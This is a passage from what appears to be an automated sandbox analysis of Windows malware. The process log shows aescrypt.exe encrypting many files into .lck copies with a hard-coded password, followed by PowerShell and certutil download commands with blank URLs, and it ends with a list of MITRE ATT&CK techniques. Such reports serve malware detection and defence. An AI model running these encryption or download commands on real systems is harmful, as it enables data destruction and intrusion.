    3⤵
    PID:6328
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "sa.9WZDNCRFHVFW_0_0010_.Public.InstallAgent.dat.lck" "sa.9WZDNCRFHVFW_0_0010_.Public.InstallAgent.dat"
    3⤵
    PID:6352
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "sa.9NBLGGH1ZRPV_0_0010_.Public.InstallAgent.dat.lck" "sa.9NBLGGH1ZRPV_0_0010_.Public.InstallAgent.dat"
    3⤵
    PID:6376
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "jusched.log.lck" "jusched.log"
    3⤵
    PID:6396
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "dd_vcredistMSI5B67.txt.lck" "dd_vcredistMSI5B67.txt"
    3⤵
    PID:6420
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "BleachGap.bin.exe.lck" "BleachGap.bin.exe"
    3⤵
    PID:6444
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Microsoft.lck" "Microsoft"
    3⤵
    PID:6468
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "tmp731C.tmp.lck" "tmp731C.tmp"
    3⤵
    PID:6484
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "tmp6C1E.tmp.lck" "tmp6C1E.tmp"
    3⤵
    PID:6508
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "tmp6E6F.tmp.lck" "tmp6E6F.tmp"
    3⤵
    PID:4028
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "tmp702E.tmp.lck" "tmp702E.tmp"
    3⤵
    PID:6620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
    3⤵
    PID:6656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:6668
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck" "aescrypt.exe"
    3⤵
    PID:6688
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck" "DiscordSendWebhook.exe"
    3⤵
    PID:6768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:6772
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck" "aescrypt.exe"
    3⤵
    PID:6752
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck" "aescrypt.exe.lck"
    3⤵
    PID:6724
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck" "DiscordSendWebhook.exe"
    3⤵
    PID:6760
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck" "DiscordSendWebhook.exe.lck"
    3⤵
    PID:6780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:6804
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck" "aescrypt.exe"
    3⤵
    PID:6872
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck" "aescrypt.exe.lck"
    3⤵
    PID:6876
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck.lck" "aescrypt.exe.lck.lck"
    3⤵
    PID:6856
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck" "DiscordSendWebhook.exe"
    3⤵
    PID:6828
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck" "DiscordSendWebhook.exe.lck"
    3⤵
    PID:6864
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck"
    3⤵
    PID:6884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:6908
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck" "aescrypt.exe"
    3⤵
    PID:6944
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck" "aescrypt.exe.lck"
    3⤵
    PID:6924
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck.lck" "aescrypt.exe.lck.lck"
    3⤵
    PID:6920
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck"
    3⤵
    PID:6968
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck" "DiscordSendWebhook.exe"
    3⤵
    PID:6992
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck" "DiscordSendWebhook.exe.lck"
    3⤵
    PID:7004
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck"
    3⤵
    PID:7032
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck"
    3⤵
    PID:7056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:7080
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck" "aescrypt.exe"
    3⤵
    PID:7096
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck" "aescrypt.exe.lck"
    3⤵
    PID:7116
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck.lck" "aescrypt.exe.lck.lck"
    3⤵
    PID:4724
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck"
    3⤵
    PID:7144
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck.lck"
    3⤵
    PID:7160
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck" "DiscordSendWebhook.exe"
    3⤵
    PID:6176
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck" "DiscordSendWebhook.exe.lck"
    3⤵
    PID:6208
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck"
    3⤵
    PID:6224
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck"
    3⤵
    PID:6264
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck.lck"
    3⤵
    PID:6300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:6316
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck" "aescrypt.exe"
    3⤵
    PID:6340
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck" "aescrypt.exe.lck"
    3⤵
    PID:6364
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck.lck" "aescrypt.exe.lck.lck"
    3⤵
    PID:6400
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck"
    3⤵
    PID:6424
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck.lck"
    3⤵
    PID:6460
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck.lck.lck"
    3⤵
    PID:6480
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck" "DiscordSendWebhook.exe"
    3⤵
    PID:6496
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck" "DiscordSendWebhook.exe.lck"
    3⤵
    PID:6576
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck"
    3⤵
    PID:3032
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck"
    3⤵
    PID:6592
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck.lck"
    3⤵
    PID:6616
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck.lck.lck"
    3⤵
    PID:6640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:6676
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck" "aescrypt.exe"
    3⤵
    PID:6692
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck" "aescrypt.exe.lck"
    3⤵
    PID:6788
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck.lck" "aescrypt.exe.lck.lck"
    3⤵
    PID:6728
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck"
    3⤵
    PID:6740
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck.lck"
    3⤵
    PID:6712
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck.lck.lck"
    3⤵
    PID:6756
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "aescrypt.exe.lck.lck.lck.lck.lck.lck.lck" "aescrypt.exe.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6716
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck" "DiscordSendWebhook.exe"
    3⤵
    PID:6900
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck" "DiscordSendWebhook.exe.lck"
    3⤵
    PID:6916
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck"
    3⤵
    PID:4228
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck"
    3⤵
    PID:6868
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck.lck"
    3⤵
    PID:6888
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck.lck.lck"
    3⤵
    PID:6908
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DiscordSendWebhook.exe.lck.lck.lck.lck.lck.lck.lck" "DiscordSendWebhook.exe.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6928
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:6960
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c Invoke-WebRequest -Uri -OutFile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4716
- - C:\Windows\system32\certutil.exe
    certutil -urlcache -split -f
    3⤵
    PID:6368

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1056

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\32c59a4ffccb45fca1e49fe24760ce2b /t 3044 /p 3040
1⤵
PID:908

C:\Windows\explorer.exe
explorer.exe
1⤵
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5088

C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4968

C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:3404

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

File Deletion

T1107

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery